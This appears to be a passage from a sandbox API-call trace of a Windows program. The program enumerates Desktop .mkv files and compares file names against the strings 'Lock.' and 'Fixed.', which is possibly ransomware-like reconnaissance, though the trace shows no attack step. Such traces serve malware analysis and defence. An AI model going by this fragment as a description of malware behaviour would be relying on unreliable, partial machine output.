hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0086.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0086.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0086.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75e70 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0086.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5fba0 [0086.442] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/-yB2WD9ZHipl10.mkv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\-yB2WD9ZHipl10.mkv", lpFilePart=0x8cf650*="-yB2WD9ZHipl10.mkv") returned 0x2a [0086.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fba0 | out: hHeap=0x2af0000) returned 1 [0086.443] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\-yB2WD9ZHipl10.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\-yb2wd9zhipl10.mkv")) returned 0xffffffff [0086.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75e70 | out: hHeap=0x2af0000) returned 1 [0086.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0086.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0086.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0086.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0086.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0086.443] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0086.497] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.497] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0086.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0086.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0LCfOxpKhBY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LCfOxpKhBY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CfOxpKhBY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fOxpKhBY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OxpKhBY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xpKhBY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pKhBY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KhBY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hBY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BY.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0086.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0086.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0086.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0086.498] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0086.498] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76db0 [0086.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0086.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0LCfOxpKhBY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LCfOxpKhBY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CfOxpKhBY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fOxpKhBY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OxpKhBY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xpKhBY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pKhBY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KhBY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hBY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0086.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BY.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76ec8 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0086.499] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a76ec8 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0086.499] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0086.499] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9160 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0086.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0086.500] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6568 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0086.500] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0086.500] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa66f0 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0086.500] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.500] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0086.500] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.500] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.500] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.501] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.501] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.501] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/0LCfOxpKhBY.mkv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 0x9a4280 [0086.501] FindClose (in: hFindFile=0x9a4280 | out: hFindFile=0x9a4280) returned 1 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.501] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.502] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.502] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a778f0 [0086.502] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0086.502] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a778f0 | out: hHeap=0x2af0000) returned 1 [0086.503] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0086.503] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.503] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 